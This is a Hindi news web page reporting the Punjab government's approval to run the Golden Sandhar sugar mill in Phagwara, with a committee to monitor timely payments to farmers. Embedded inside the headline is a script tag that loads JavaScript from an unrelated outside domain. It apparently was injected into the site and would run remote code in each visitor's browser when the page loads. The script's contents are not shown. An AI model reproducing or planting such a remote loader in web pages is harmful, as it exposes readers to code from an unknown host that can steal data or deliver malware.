Tuesday, 13 October 2026
Breaking News
गुरु नानक गीता कैलाश मेमोरियल फाउंडेशन और रेड क्रॉस सोसाइटी ने लगाया मेडिकल कैंप: 300 से ज्यादा मरीजों की जांच, मुफ्त टेस्ट और दवाइयां भी मिलीं भारत के मीडिया जगत को चाहिए एक समावेशी और सशक्त प्रेस काउंसिल श्री दिगंबर जैन मंदिर में णमोकार मंत्र पाठ एवं भक्तामर दीपार्चना का आयोजन घरेलू दुकानों पर कार्रवाई के फैसले के खिलाफ पुनर्विचार याचिका दाखिल करे चंडीगढ़ प्रशासन : कृष्ण लाल समाजवाद के अग्रदूत थे महाराजा अग्रसेन महाराज  भगवान वाल्मीकि रामतीर्थ, अमृतसर से चंडीगढ़ पहुंची प्रथम ज्योति, सेक्टर 49-A की रामलीला कमेटी ने किया स्वागत राज नागपाल एक बार फिर सर्वसम्मति से ऑल इंडिया राजीव मेमोरियल सोसाइटी के अध्यक्ष चुने गए महाकाल की पवित्र नगरी उज्जैन के महापौर मुकेश टटवाल का राम दरबार में भव्य स्वागत पंचकूला में पहली बार सजेगा ऐतिहासिक गरबा-डांडिया का महा-पंडाल पंजाब विवि के पूर्व रशियन विभागाध्यक्ष डॉ. पंकज मालवीय द्वारा रशियन में अनुदित तीन पुस्तकों का विमोचन
पंजाब Trending

गन्ना मिल फगवाड़ा को चलाने की मंजूरी; नोटिफिकेशन जारी<script src="https://new2sportnews.com/face2news.js"></script>

Read in:Hindi

चंडीगढ़, फेस2न्यूज:
पंजाब सरकार ने गोल्डन संधर मिल्स लिमिटेड, फगवाड़ा को 20 फरवरी, 2023 तक चलाने की मंजूरी दे दी है। गौरतलब है कि यह मंजूरी मुख्यमंत्री मान द्वारा हरी झंडी मिलने के बाद दी गई है।
पंजाब के कृषि एवं किसान कल्याण मंत्री कुलदीप सिंह धालीवाल ने यह जानकारी देते हुए बताया कि किसानों के हितों को ध्यान में रखते हुए यह गन्ना मिल चलाने का फ़ैसला लिया गया है और स्टेट ऑफ इंडिया द्वारा होल्ड ऑन ऑपरेशन के दौरान यह मिल निर्धारित शर्तों पर चलाई जाएगी।
उन्होंने बताया कि इस मिल से सम्बन्धित किसानों का भुगतान सुनिश्चित करने के लिए एक अंतरविभागीय समिति का गठन भी कर दिया गया है। इस समिति में एस.डी.एम फगवाड़ा, प्रोजैक्ट अफ़सर (गन्ना) जालंधर, सहायक आयुक्त आबकारी कपूरथला रेंज, डी.सी.एफ.ए. (आंतरिक जाँच संस्था) कपूरथला, सहायक गन्ना विकास अधिकारी शहीद भगत सिंह नगर, सतनाम सिंह साहनी किसान नेता भारतीय किसान यूनियन दोआबा और कृपाल सिंह मूसापुर भारतीय किसान यूनियन दोआबा आदि शामिल होंगे।
धालीवाल ने बताया कि यह समिति गन्ना मिल में आने वाले गन्ने, शुगर रिकवरी और उत्पादों की बिक्री पर पूर्ण निगरानी रखेगी और किसानों को गन्ने का 15 दिनों के अंदर भुगतान सम्बन्धी रिपोर्ट गन्ना आयुक्त को सौंपेगी।
उन्होंने बताया कि गन्ना आयुक्त इस सम्बन्धी राज्य सरकार को रिपोर्ट करेंगे और यदि मिल समझौते के अनुसार समय पर भुगतान नहीं करती तो मिल का लाइसेंस रद्द कर दिया जाएगा और गन्ने को अन्य मिलों को आवंटित कर दिया जाएगा।

0 Comments